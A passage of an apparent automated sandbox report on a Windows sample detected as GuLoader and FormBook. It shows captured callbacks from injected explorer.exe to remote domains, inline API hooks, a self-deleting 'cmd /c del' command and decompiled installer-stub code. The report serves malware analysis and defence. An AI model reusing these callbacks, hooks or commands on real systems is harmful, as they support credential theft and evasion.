Mar 30, 2023 10:39:18.269835949 CEST	448	IN	HTTP/1.1 403 Forbidden Server: nginx Date: Thu, 30 Mar 2023 08:39:18 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.11.20	49809	198.54.117.215	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 30, 2023 10:40:20.942615986 CEST	462	OUT	GET /mi94/?5jbDpbb=CmkHYlvtWFyiY6x7wzgggV7o1XWqH1EIkW2vDHN+0HbYWyx2WNdLHwPWYAq7GV6cOSXz&-Z=6lfDx HTTP/1.1 Host: www.crosswalkconsulting.co.uk Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.11.20	49811	23.227.38.74	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 30, 2023 10:41:01.465365887 CEST	470	OUT	GET /mi94/?5jbDpbb=4Lo61ZRTO0uvURH/h1aY/xwwIPd8h5yyY/H7In0LOtAqoGXoXBtvh8DjOZnAsSvGQgKa&-Z=6lfDx HTTP/1.1 Host: www.textare.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 30, 2023 10:41:01.489487886 CEST	471	IN	HTTP/1.1 403 Forbidden Date: Thu, 30 Mar 2023 08:41:01 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Sorting-Hat-PodId: 287 X-Sorting-Hat-ShopId: 67998253344 X-Dc: gcp-europe-west3 X-Request-ID: 42559cb3-ec2a-49e6-a6d6-1876d50ea601 X-Download-Options: noopen X-XSS-Protection: 1; mode=block X-Permitted-Cross-Domain-Policies: none X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FcojGFaKiNiC3vMuw%2B7b%2FcNShbccnjzAjvmb%2FmDMjhmiklGAuYm8iTwxz%2BU2qFwiwHglquT3Cvtzi5OKZ10O5by6WBJQZH%2FzChwq8iLrn%2FfAe3PUmiJzOKqNAonuke5xJQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} Server-Timing: cfRequestDuration;dur=14.999866 Server: cloudflare CF-RAY: 7aff0d183e0f9219-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#30303
Mar 30, 2023 10:41:01.489526033 CEST	473	IN	Data Raw: 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 Data Ascii: 0;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;
Mar 30, 2023 10:41:01.489579916 CEST	474	IN	Data Raw: 2c 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 44 75 20 68 61 72 20 69 6b 6b 65 20 74 69 6c 6c 61 74 65 6c 73 65 20 74 69 6c 20 c3 a5 20 c3 a5 70 6e 65 20 64 65 74 74 65 20 6e 65 74 74 73 74 65 64 65 74 22 0a 20 20 7d 2c Data Ascii: , "content-title": "Du har ikke tillatelse til pne dette nettstedet" }, "th": { "title": "", "content-title": "
Mar 30, 2023 10:41:01.489675999 CEST	475	IN	Data Raw: 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 4e 6f 6e 20 68 61 69 20 6c e2 80 99 61 75 74 6f 72 69 7a 7a 61 7a 69 6f 6e 65 20 70 65 72 20 61 63 63 65 64 65 72 65 20 61 20 71 75 65 73 74 6f 20 73 69 74 6f 20 77 65 62 22 0a 20 20 7d 2c 0a 20 20 22 Data Ascii: ntent-title": "Non hai lautorizzazione per accedere a questo sito web" }, "pl": { "title": "Odmowa dostpu", "content-title": "Nie masz uprawnie dostpu do tej strony internetowej" }, "sv": { "title": "tkomst nekad
Mar 30, 2023 10:41:01.489686966 CEST	476	IN	Data Raw: 62 20 73 69 74 65 73 69 6e 65 20 65 72 69 c5 9f 69 6d 20 69 7a 6e 69 6e 69 7a 20 79 6f 6b 2e 22 0a 20 20 7d 2c 0a 20 20 22 7a 68 2d 43 4e 22 3a 20 7b 0a 20 20 20 20 22 74 69 74 6c 65 22 3a 20 22 e8 ae bf e9 97 ae e8 a2 ab e6 8b 92 e7 bb 9d 22 2c Data Ascii: b sitesine eriim izniniz yok." }, "zh-CN": { "title": "", "content-title": "" }, "nl": { "title": "Toegang geweigerd", "content-title": "Je hebt geen toestemming voor toegang tot
Mar 30, 2023 10:41:01.489696026 CEST	476	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.11.20	49813	23.27.72.143	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 30, 2023 10:41:22.136022091 CEST	484	OUT	GET /mi94/?-Z=6lfDx&5jbDpbb=sfgefL3EX7tLrVmbrrvt2gRLjrdY9EgZIzRUFJ3eu0i+5BdWwZEHyNY8KODjs8HGUQbA HTTP/1.1 Host: www.peterslawonline.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 30, 2023 10:41:22.307423115 CEST	485	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 30 Mar 2023 08:41:22 GMT Content-Type: text/html Content-Length: 807 Connection: close Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 d9 d9 d6 dd d0 c6 bd b5 c6 f3 d2 b5 b9 dc c0 ed d3 d0 cf de b9 ab cb be 27 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 20 20 20 20 76 61 72 20 62 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0d 0a 20 20 20 20 76 61 72 20 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2e 73 70 6c 69 74 28 27 3a 27 29 5b 30 5d 3b 0d 0a 20 20 20 20 69 66 20 28 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 3d 3d 20 27 68 74 74 70 73 27 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 73 3a 2f 2f 7a 7a 2e 62 64 73 74 61 74 69 63 2e 63 6f 6d 2f 6c 69 6e 6b 73 75 62 6d 69 74 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 65 6c 73 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 3a 2f 2f 70 75 73 68 2e 7a 68 61 6e 7a 68 61 6e 67 2e 62 61 69 64 75 2e 63 6f 6d 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 0d 0a 20 20 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 62 70 2c 20 73 29 3b 0d 0a 7d 29 28 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 63 6f 6d 6d 6f 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 74 6a 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><script>(function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s);})();</script></head><script language="javascript" type="text/javascript" src="/common.js"></script><script language="javascript" type="text/javascript" src="/tj.js"></script></body></html>

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x83 0x3E 0xED
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x8B 0xBE 0xED
GetMessageW	INLINE	0x48 0x8B 0xB8 0x8B 0xBE 0xED
GetMessageA	INLINE	0x48 0x8B 0xB8 0x83 0x3E 0xED

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: ekstre.exePID: 7268, Parent PID: 4940

General

Target ID:	0
Start time:	10:35:50
Start date:	30/03/2023
Path:	C:\Users\user\Desktop\ekstre.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\ekstre.exe
Imagebase:	0x400000
File size:	321598 bytes
MD5 hash:	6F2C2220FCDBB75D33AEA719A1B55B24
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000000.00000002.1120014869.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1121676289.00000000066D6000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: ekstre.exePID: 6096, Parent PID: 7268

General

Target ID:	1
Start time:	10:36:10
Start date:	30/03/2023
Path:	C:\Users\user\Desktop\ekstre.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\ekstre.exe
Imagebase:	0x400000
File size:	321598 bytes
MD5 hash:	6F2C2220FCDBB75D33AEA719A1B55B24
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1211195080.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.1211195080.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.1211195080.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.1211195080.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1211195080.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1274181140.0000000033DE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.1274181140.0000000033DE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.1274181140.0000000033DE0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.1274181140.0000000033DE0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1274181140.0000000033DE0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: explorer.exePID: 4940, Parent PID: 6096

General

Target ID:	2
Start time:	10:36:19
Start date:	30/03/2023
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff614090000
File size:	4849904 bytes
MD5 hash:	5EA66FF5AE5612F921BC9DA23BAC95F7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000002.00000002.5864084304.000000000A65C000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: NETSTAT.EXEPID: 1708, Parent PID: 4940

General

Target ID:	3
Start time:	10:36:30
Start date:	30/03/2023
Path:	C:\Windows\SysWOW64\NETSTAT.EXE
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\NETSTAT.EXE
Imagebase:	0x590000
File size:	32768 bytes
MD5 hash:	9DB170ED520A6DD57B5AC92EC537368A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.5841711739.00000000028C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.5841711739.00000000028C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.5841711739.00000000028C0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.5841711739.00000000028C0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.5841711739.00000000028C0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.5842627078.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.5842627078.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.5842627078.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.5842627078.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.5842627078.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.5838086989.0000000000370000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.5838086989.0000000000370000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.5838086989.0000000000370000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.5838086989.0000000000370000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.5838086989.0000000000370000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 9972, Parent PID: 1708

General

Target ID:	4
Start time:	10:36:34
Start date:	30/03/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Users\user\Desktop\ekstre.exe"
Imagebase:	0xd90000
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 3024, Parent PID: 9972

General

Target ID:	5
Start time:	10:36:34
Start date:	30/03/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff755060000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: ekstre.exePID: 7268, Parent PID: 4940COMMON

Execution Graph

Execution Coverage:	28%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20.9%
Total number of Nodes:	705
Total number of Limit Nodes:	19

Executed Functions

Function 00403390 Relevance: 84.4, APIs: 33, Strings: 15, Instructions: 417
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			_entry_() {
				CHAR* _v8;
				long _v12;
				char _v16;
				long _v20;
				void* _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed int _v42;
				long _v44;
				signed int _v48;
				char _v163;
				char _v175;
				signed short _v182;
				struct _OSVERSIONINFOA _v196;
				struct _SHFILEINFOA _v548;
				intOrPtr* _t87;
				char* _t93;
				void* _t95;
				void* _t99;
				CHAR* _t101;
				signed int _t103;
				int _t106;
				void* _t107;
				int _t108;
				void* _t110;
				void* _t134;
				signed int _t150;
				void* _t153;
				void* _t158;
				intOrPtr* _t159;
				void* _t170;
				CHAR* _t173;
				void _t179;
				void* _t198;
				void* _t199;
				signed char* _t213;
				CHAR* _t217;
				void* _t223;

				_v20 = 0;
				_v8 = "Error writing temporary file. Make sure your temp folder is valid.";
				_v12 = 0;
				_v16 = 0x20;
				SetErrorMode(0x8001); // executed
				_v196.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v196.dwOSVersionInfoSize = 0x9c;
				if(GetVersionExA( &_v196) != 0) {
					L3:
					_t223 = _v196.dwPlatformId - 2;
					L4:
					if(_t223 < 0) {
						_v42 = _v42 & 0x00000000;
						if(_v175 < 0x41) {
							_v48 = 0;
						} else {
							_v48 = _v175 - 0x40;
						}
					}
					if(_v196.dwMajorVersion < 0xa) {
						_v182 = _v182 & 0x00000000;
					}
					 *0x7c6018 = _v196.dwBuildNumber;
					 *0x7c601c = (_v196.dwMajorVersion & 0x0000ffff | _v196.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
					if( *0x7c601e != 0x600) {
						_t159 = E00406640(0);
						if(_t159 != 0) {
							 *_t159(0xc00);
						}
					}
					_t217 = "UXTHEME";
					goto L14;
					while(1) {
						L37:
						_t179 =  *_t95;
						_t234 = _t179;
						if(_t179 == 0) {
							break;
						}
						__eflags = _t179 - 0x20;
						if(_t179 != 0x20) {
							L23:
							__eflags =  *_t95 - 0x22;
							_v16 = 0x20;
							if( *_t95 == 0x22) {
								_t95 = _t95 + 1;
								__eflags = _t95;
								_v16 = 0x22;
							}
							__eflags =  *_t95 - 0x2f;
							if( *_t95 != 0x2f) {
								L35:
								_t95 = E00405BF1(_t95, _v16);
								__eflags =  *_t95 - 0x22;
								if(__eflags == 0) {
									_t95 = _t95 + 1;
									__eflags = _t95;
								}
								continue;
							} else {
								_t95 = _t95 + 1;
								__eflags =  *_t95 - 0x53;
								if( *_t95 != 0x53) {
									L30:
									__eflags =  *_t95 - ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC");
									if( *_t95 != ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC")) {
										L34:
										__eflags =  *(_t95 - 2) - ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=");
										if( *(_t95 - 2) == ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=")) {
											 *(_t95 - 2) =  *(_t95 - 2) & 0x00000000;
											__eflags = _t95 + 2;
											E00406234(0x7f1000, _t95 + 2);
											L40:
											GetTempPathA(0x2000, 0x7f9000); // executed
											_t99 = E0040335F(_t234);
											_t235 = _t99;
											if(_t99 != 0) {
												L43:
												DeleteFileA(0x7f7000); // executed
												_t101 = E00402F0C(_t237, _v12); // executed
												_v8 = _t101;
												if(_t101 != 0) {
													L53:
													E00403940();
													__imp__OleUninitialize();
													_t248 = _v8;
													if(_v8 == 0) {
														__eflags =  *0x7c5ff4;
														if( *0x7c5ff4 == 0) {
															L77:
															_t103 =  *0x7c600c;
															__eflags = _t103 - 0xffffffff;
															if(_t103 != 0xffffffff) {
																_v20 = _t103;
															}
															ExitProcess(_v20);
														}
														_t106 = OpenProcessToken(GetCurrentProcess(), 0x28,  &_v24);
														__eflags = _t106;
														if(_t106 != 0) {
															LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v40.Privileges));
															_v40.PrivilegeCount = 1;
															_v28 = 2;
															AdjustTokenPrivileges(_v24, 0,  &_v40, 0, 0, 0);
														}
														_t107 = E00406640(4);
														__eflags = _t107;
														if(_t107 == 0) {
															L75:
															_t108 = ExitWindowsEx(2, 0x80040002);
															__eflags = _t108;
															if(_t108 != 0) {
																goto L77;
															}
															goto L76;
														} else {
															_t110 =  *_t107(0, 0, 0, 0x25, 0x80040002);
															__eflags = _t110;
															if(_t110 == 0) {
																L76:
																E0040140B(9);
																goto L77;
															}
															goto L75;
														}
													}
													E0040594A(_v8, 0x200010);
													ExitProcess(2);
												}
												if( *0x7c5f7c == _t101) {
													L52:
													 *0x7c600c =  *0x7c600c | 0xffffffff;
													_v20 = E00403A1A( *0x7c600c);
													goto L53;
												}
												_t213 = E00405BF1(0x7ef000, _t101);
												if(_t213 < 0x7ef000) {
													L49:
													_t244 = _t213 - 0x7ef000;
													_v8 = "Error launching installer";
													if(_t213 < 0x7ef000) {
														_t173 = E004058B5(_t248);
														lstrcatA(0x7f9000, "~nsu");
														if(_t173 != 0) {
															lstrcatA(0x7f9000, "A");
														}
														lstrcatA(0x7f9000, ".tmp");
														if(lstrcmpiA(0x7f9000, 0x7f5000) != 0) {
															_push(0x7f9000);
															if(_t173 == 0) {
																E00405898();
															} else {
																E0040581B();
															}
															SetCurrentDirectoryA(0x7f9000);
															if( *0x7f1000 == 0) {
																E00406234(0x7f1000, 0x7f5000);
															}
															E00406234(0x7c7000, _v24);
															_t194 = "A";
															_v12 = 0x1a;
															 *0x7c9000 = "A";
															do {
																E004062C7(_t173, 0x7a6d28, 0x7f9000, 0x7a6d28,  *((intOrPtr*)( *0x7c5f70 + 0x120)));
																DeleteFileA(0x7a6d28);
																_t173 = 0;
																if(_v8 != 0 && CopyFileA(0x7fd000, 0x7a6d28, 1) != 0) {
																	E0040600D(_t194, 0x7a6d28, 0);
																	E004062C7(0, 0x7a6d28, 0x7f9000, 0x7a6d28,  *((intOrPtr*)( *0x7c5f70 + 0x124)));
																	_t134 = E004058CD(0x7a6d28);
																	if(_t134 != 0) {
																		CloseHandle(_t134);
																		_v8 = 0;
																	}
																}
																 *0x7c9000 =  *0x7c9000 + 1;
																_t62 =  &_v12;
																 *_t62 = _v12 - 1;
															} while ( *_t62 != 0);
															E0040600D(_t194, 0x7f9000, _t173);
														}
														goto L53;
													}
													 *_t213 =  *_t213 & 0x00000000;
													_t214 =  &(_t213[4]);
													if(E00405CB4(_t244,  &(_t213[4])) == 0) {
														goto L53;
													}
													E00406234(0x7f1000, _t214);
													E00406234("C:\\Users\\Arthur\\procharity\\Anasarca\\Uncompelled\\Ediktet\\Tavlemestrene\\Ungeneral", _t214);
													_v8 = _v8 & 0x00000000;
													goto L52;
												}
												_t150 = (( *0x40a15b << 0x00000008 |  *0x40a15a) << 0x00000008 |  *0x40a159) << 0x00000008 | " _?=";
												while( *_t213 != _t150) {
													_t213 = _t213 - 1;
													if(_t213 >= 0x7ef000) {
														continue;
													}
													goto L49;
												}
												goto L49;
											}
											GetWindowsDirectoryA(0x7f9000, 0x1ffb);
											lstrcatA(0x7f9000, "\\Temp");
											_t153 = E0040335F(_t235);
											_t236 = _t153;
											if(_t153 != 0) {
												goto L43;
											}
											GetTempPathA(0x1ffc, 0x7f9000);
											lstrcatA(0x7f9000, "Low");
											SetEnvironmentVariableA("TEMP", 0x7f9000);
											SetEnvironmentVariableA("TMP", 0x7f9000);
											_t158 = E0040335F(_t236);
